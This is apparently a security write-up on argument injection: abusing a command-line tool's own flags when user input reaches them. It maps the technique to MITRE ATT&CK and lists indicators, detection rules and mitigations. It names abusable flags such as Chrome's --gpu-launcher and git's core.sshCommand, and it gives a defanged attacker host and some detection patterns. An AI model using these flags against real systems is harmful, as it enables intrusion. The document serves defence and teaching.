Full Report
Command injection is a well known bug where user input is concatenated with a bash command. Because of the string concatenation, an attacker can inject things like ` or ; to execute a different bash command entirely. Over the years, shell metacharacters have started to get filtered out. So, can we do anything useful? Well, it depends! The concept of argument injection is using the same input vector but the goal is to add arguments to the command. Some CLI commands are extremely powerful. For instance, on Chrome, --gpu-launcher is an argument that can be used to execute arbitrary commands. This link is a set of known commands that have easy-to-pwn argument injection payloads. This is sort of like gtfobins.
Analysis Summary
# Tool/Technique: Argument Injection
## Overview
Argument injection is a vulnerability that occurs when an application passes user-controlled input as arguments to a command-line interface (CLI) tool without proper validation or escaping. Unlike classic command injection, which uses shell metacharacters (e.g., `;`, `|`, `` ` ``) to execute new commands, argument injection utilizes the legitimate flags and options of the target binary to achieve malicious goals such as arbitrary code execution, file disclosure, or data exfiltration.
## Technical Details
- **Type:** Technique
- **Platform:** Cross-platform (Linux, Windows, macOS)
- **Capabilities:** Command execution, Arbitrary File Read/Write, Library Loading, Information Disclosure.
- **First Seen:** Historically significant, but popularized as a distinct class of vulnerability through projects like "Argument Injection Vectors" (SonarSource).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- **T1190 - Exploit Public-Facing Application**
- **TA0002 - Execution**
- **T1203 - Exploitation for Client Execution**
- **T1059.004 - Command and Scripting Interpreter: Unix Shell**
- **TA0005 - Defense Evasion**
- **T1202 - Indirect Command Execution**
- **T1211 - Exploitation for Defense Evasion**
## Functionality
### Core Capabilities
* **Arbitrary Command Execution:** Invoking sub-processes or "launchers" via built-in arguments (e.g., Chrome's `--gpu-launcher`).
* **File Manipulation:** Using flags to read sensitive system files (e.g., SSH's `-F` to specify a config file) or write malicious content to the filesystem (e.g., `tar` or `zip` archiving features).
* **Configuration Overriding:** Replacing intended application settings with malicious ones via command-line flags.
### Advanced Features
* **Library Loading:** Some binaries allow loading shared objects or DLLs via arguments, facilitating shellcode execution within the context of a trusted process.
* **Remote Protocol Hijacking:** Using tools like `git` or `ssh` to force connections to attacker-controlled servers via proxy or command options.
* **Bypassing Filtration:** Because the technique does not require shell metacharacters, it often bypasses Web Application Firewalls (WAFs) and input sanitizers that only look for characters like `&` or `;`.
## Indicators of Compromise
* **File Hashes:** N/A (Technique-based)
* **File Names:** N/A
* **Registry Keys:** N/A
* **Network Indicators:** Outbound connections from unexpected binaries (e.g., `git` or `psql` connecting to an unknown external IP `hXXp[:]//evil-server[.]com`).
* **Behavioral Indicators:**
* Web server processes (`www-data`, `apache`, `nginx`) spawning sub-processes with unusual or excessive flags.
* Command lines containing double dashes `--` followed by execution-related keywords like `proxy-command`, `launcher`, or `output`.
* The presence of `--` (double dash) used to terminate positional arguments, followed by injected flags.
## Associated Threat Actors
* This technique is commonly utilized by bug bounty hunters and penetration testers.
* State-sponsored groups (APTs) and sophisticated cybercriminals frequently use argument injection against web applications and Git-based CI/CD pipelines to gain initial footprints.
## Detection Methods
* **Behavioral Detection:** Monitor process creation events (EDR/Sysmon) for binaries like `tar`, `git`, `ssh`, and `curl` where the command line contains suspicious patterns or unexpected destination paths.
* **Log Analysis:** Audit web application logs for inputs starting with `-` or strings containing `--`.
* **SIEM Rules:** Flag instances where common CLI tools are executed with flags that lead to command execution (e.g., `git -c core.sshCommand=...`).
## Mitigation Strategies
* **Use Argument Separators:** Use the `--` (double-dash) separator in shell commands to signal the end of command options, ensuring subsequent user input is treated as a positional argument rather than a flag.
* **Input Validation:** Implement strict allow-lists for user input. Disallow any input starting with a hyphen `-`.
* **Avoid Shell Execution:** Use language-specific APIs (e.g., Python's `subprocess.run` with a list of arguments, rather than `shell=True`) that handle argument escaping automatically.
* **Least Privilege:** Run applications with the minimum necessary permissions to limit the impact of a successful injection.
## Related Tools/Techniques
* **GTFOBins:** A curated list of Unix binaries that can be used to bypass local security restrictions.
* **Living off the Land Binaries (LoLBins):** Legitimate binaries used for malicious purposes.
* **Command Injection:** The broader category of vulnerabilities involving malicious command execution.